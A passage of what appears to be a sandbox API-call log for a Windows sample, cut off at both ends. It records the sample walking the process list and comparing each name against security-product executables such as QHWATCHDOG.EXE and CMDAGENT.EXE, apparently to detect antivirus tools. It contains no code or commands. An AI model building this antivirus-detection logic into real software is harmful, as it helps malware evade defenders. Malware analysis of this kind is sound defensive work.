returned 0x8 [0163.128] lstrcmpW 
(lpString1="PING.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.128] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.128] CloseHandle (hObject=0xe0) returned 1 [0163.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.130] lstrcpyW (in: lpString1=0x18f8e4, lpString2="CMDAGENT.EXE" | out: lpString1="CMDAGENT.EXE") returned="CMDAGENT.EXE" [0163.130] lstrlenW (lpString="CMDAGENT.EXE") returned 12 [0163.130] CharUpperBuffW (in: lpsz="CMDAGENT.EXE", cchLength=0xc | out: lpsz="CMDAGENT.EXE") returned 0xc [0163.130] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.131] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.131] lstrlenW (lpString="[System Process]") returned 16 [0163.131] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.131] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="CMDAGENT.EXE") returned -1 [0163.131] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.132] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.132] lstrlenW (lpString="System") returned 6 [0163.132] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 
[0163.132] lstrcmpW (lpString1="SYSTEM", lpString2="CMDAGENT.EXE") returned 1 [0163.132] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.132] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.132] lstrlenW (lpString="smss.exe") returned 8 [0163.132] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.132] lstrcmpW (lpString1="SMSS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.132] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.133] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.133] lstrlenW (lpString="csrss.exe") returned 9 [0163.133] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.133] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.133] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.134] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.134] lstrlenW (lpString="wininit.exe") returned 11 [0163.134] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.134] lstrcmpW (lpString1="WININIT.EXE", lpString2="CMDAGENT.EXE") returned 1 
[0163.134] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.134] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.134] lstrlenW (lpString="csrss.exe") returned 9 [0163.134] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.134] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.134] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.135] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.135] lstrlenW (lpString="winlogon.exe") returned 12 [0163.135] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.135] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.135] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.135] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.135] lstrlenW (lpString="services.exe") returned 12 [0163.135] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.135] lstrcmpW (lpString1="SERVICES.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.135] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.136] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.136] lstrlenW (lpString="lsass.exe") returned 9 [0163.136] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.136] lstrcmpW (lpString1="LSASS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.136] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.136] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.136] lstrlenW (lpString="lsm.exe") returned 7 [0163.137] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.137] lstrcmpW (lpString1="LSM.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.137] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.137] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.137] lstrlenW (lpString="svchost.exe") returned 11 [0163.137] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.137] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.137] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.138] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.138] lstrlenW (lpString="svchost.exe") returned 11 [0163.138] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.138] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.138] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.138] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.138] lstrlenW (lpString="svchost.exe") returned 11 [0163.138] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.138] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.138] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.139] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.139] lstrlenW (lpString="svchost.exe") returned 11 [0163.139] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.139] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.139] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.139] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.139] lstrlenW (lpString="svchost.exe") returned 11 [0163.139] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.139] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.139] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.140] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.140] lstrlenW (lpString="audiodg.exe") returned 11 [0163.140] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.140] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.140] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.153] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.153] lstrlenW (lpString="svchost.exe") returned 11 [0163.153] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.153] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.153] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.153] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.153] lstrlenW (lpString="svchost.exe") returned 11 [0163.153] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.153] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.153] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.154] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.154] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.154] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.154] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.154] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.154] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.154] lstrlenW (lpString="svchost.exe") returned 11 [0163.154] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.154] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.154] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.155] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.155] lstrlenW (lpString="taskhost.exe") returned 12 [0163.155] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.155] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.155] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.155] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.155] lstrlenW (lpString="taskeng.exe") returned 11 [0163.155] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.155] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.155] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.156] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.156] lstrlenW (lpString="dwm.exe") returned 7 [0163.156] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.156] lstrcmpW (lpString1="DWM.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.156] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="explorer.exe")) returned 1 [0163.157] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.157] lstrlenW (lpString="explorer.exe") returned 12 [0163.157] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.157] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.157] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.157] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.157] lstrlenW (lpString="taskeng.exe") returned 11 [0163.157] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.157] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.157] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.158] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.158] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.158] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.158] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.158] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) 
returned 1 [0163.159] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.159] lstrlenW (lpString="taskhost.exe") returned 12 [0163.159] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.159] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.159] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.160] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.160] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.160] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.160] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.160] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.160] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.160] lstrlenW (lpString="tri.exe") returned 7 [0163.160] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.160] lstrcmpW (lpString1="TRI.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.161] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.161] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.161] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.161] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.161] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.161] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.162] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.162] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.162] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.162] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.162] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.163] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.163] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.163] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.163] lstrcmpW 
(lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.163] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.163] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.163] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.163] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.164] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.164] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.164] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.164] lstrlenW (lpString="isolation.exe") returned 13 [0163.164] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.164] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.164] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.165] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.165] lstrlenW (lpString="abc.exe") returned 7 [0163.165] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.165] lstrcmpW 
(lpString1="ABC.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.165] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.166] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.166] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.166] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.166] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.166] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 